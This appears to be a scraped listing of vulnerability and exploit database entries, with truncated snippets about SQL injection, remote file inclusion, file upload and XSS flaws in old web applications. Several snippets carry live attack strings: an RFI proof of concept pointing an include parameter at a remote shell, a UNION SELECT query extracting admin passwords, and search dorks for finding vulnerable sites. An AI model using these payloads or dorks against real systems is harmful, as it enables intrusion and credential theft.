PT-2026-42249

Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicio...

EUVD-2025-31148

Malicious code in bioql PyPI...

SQL Injection Vulnerability in D-link Central WifiManager Ra***.php Page

D-Link Central WiFiManager is D-Link centralized wireless management software. A SQL injection vulnerability exists in the D-link Central WifiManager Ra.php page, which can be exploited by an attacker to obtain sensitive information from the database...

Mihalism Multi Forum Host <= 3.0.x Remote File Inclusion Vulnerability

No description provided by source. Mihalism Multi Forum Host = v3.0.x Remote File Inclusion Vulnerability Script Page : http://www.mihalism.com/misc/downloads/ POC : /ScriptPage/source/includes/loadforum.php?mfhrootpath=http://Shell D0rK : Mihalism Multi Forum Host © 2007 GREETZ TO : TrYaG-TeaM ,...

Alstrasoft AskMe Pro 2.1 - profile.php SQL Injection

Alstrasoft AskMe Pro 2.1 - profile.php SQL Injection AlstraSoft AskMe Pro profile.php?id SQL Injection Vulnerability Author : CoBRa21 Author Web Page : null I've sold my website ipbul.org Dork : inurl:forumanswer.php?queid Script Page : http://www.alstrasoft.com/ Sql Injection :...

sX-Shop Multiple SQL Injection Vulnerability

Exploit for php platform in category web applications =================================== sX-Shop SQL Injection Vulnerability =================================== Author : CoBRa21 Author Web Page :http://ipbul.org Dork : "powered by sX-Shop" Script Page : http://www.source-worx.de/ Demo :...

Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability

Exploit for unknown platform in category web applications =============================================================== Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability =============================================================== Flax Article Manager 1.1 Remote File Upload...

Availscript Classmate File Upload

Availscript Classmate Script Remote File Upload Vulnerability ---------------------------------------------------------- Discovered By: S.W.A.T. [email protected] Home: www.batlagh.com Script Page: http://www.availscript.com/classmatescript.php...

Mihalism Multi Forum Host &lt;= 3.0.x Remote File Inclusion Vulnerability

No description provided by source. &nbs...

mihalism-rfi.txt

Mihalism Multi Forum Host = v3.0.x Remote File Inclusion Vulnerability Script Page : http://www.mihalism.com/misc/downloads/ POC : /ScriptPage/source/includes/loadforum.php?mfhrootpath=http://Shell D0rK : Mihalism Multi Forum Host © 2007 GREETZ TO : TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr ,...

Mihalism Multi Forum Host 3.0.x - Remote File Inclusion

Mihalism Multi Forum Host = v3.0.x Remote File Inclusion Vulnerability Script Page : http://www.mihalism.com/misc/downloads/ POC : /ScriptPage/source/includes/loadforum.php?mfhrootpath=http://Shell D0rK : Mihalism Multi Forum Host © 2007 GREETZ TO : TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr ,...

geometrix-sql.txt

Title: GeometriX Download Portal Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://fullaspsite.somee.com/ Script Page: http://aspindir.com/indir.asp?id=4949&sIslem=%DDndir Vuln. Password:/downindir.asp?id=-1+union+select+0,1,adminsifre,3,4,5,6,7+from+ayarlar Admin Login :...

GeometriX Download Portal (down_indir.asp id) SQL Injection Vuln

No description provided by source. Title: GeometriX Download Portal Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://fullaspsite.somee.com/ Script Page: http://aspindir.com/indir.asp?id=4949&sIslem=%DDndir Vuln...

GeometriX Download Portal - down_indir.asp?id SQL Injection

GeometriX Download Portal - downindir.asp?id SQL Injection Title: GeometriX Download Portal Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://fullaspsite.somee.com/ Script Page: http://aspindir.com/indir.asp?id=4949&sIslem=%DDndir Vuln...

EfesTECH Haber 5.0 - &#039;id&#039; SQL Injection

Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://www.haberguvercini.com Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir Vuln. Username -...

EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability

No description provided by source. Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://www.haberguvercini.com Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir Vuln. Username -...

myGallery 1.2.1&#40;myPath&#41;Remote File Include Vulnerablity

AAAAAAAAA AAAAAAAA AAA AAA AAA AAAAAAAA AAAAAAAAA AAAAAAAAA AAA AAA AAAAA AAAAAAAAAA AAA AAA AAA AAA AAA AAAAAAA AAA AAA AAAAAAAAA AAAAA AAA AAA AAA AAAAA AAA AAAAAAAA AAA AAA AAA AAA AAAAA AAA AAA AAA AAA AAAAAAAAA AAA AAA AAA AAA AAA AAA AAA AAA AAAAAAAAAA AAA AAA AAA AAA AAA AAA AAAAAAAA...

MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

No description provided by source. Mangobery-0.5.5 Found by kezzap66345 Script Page:http://mangobery.sourceforge.net/ Demo Site:http://mangobery.beryllium.ca/ Script Download:http://sourceforge.net/project/showfiles.php?groupid=63834&packageid=60858...

Active BuyandSell Remote SQL Injection Vulnerability

Title : Active BuyandSell Remote SQL Injection Vulnerability Author : CyberGhost Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8 Vuln. Username :...

ActiveBuyandSell 6.2 - &#039;buyersend.asp?catid&#039; SQL Injection

Title : Active BuyandSell Remote SQL Injection Vulnerability Author : CyberGhost Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8 Vuln. Username :...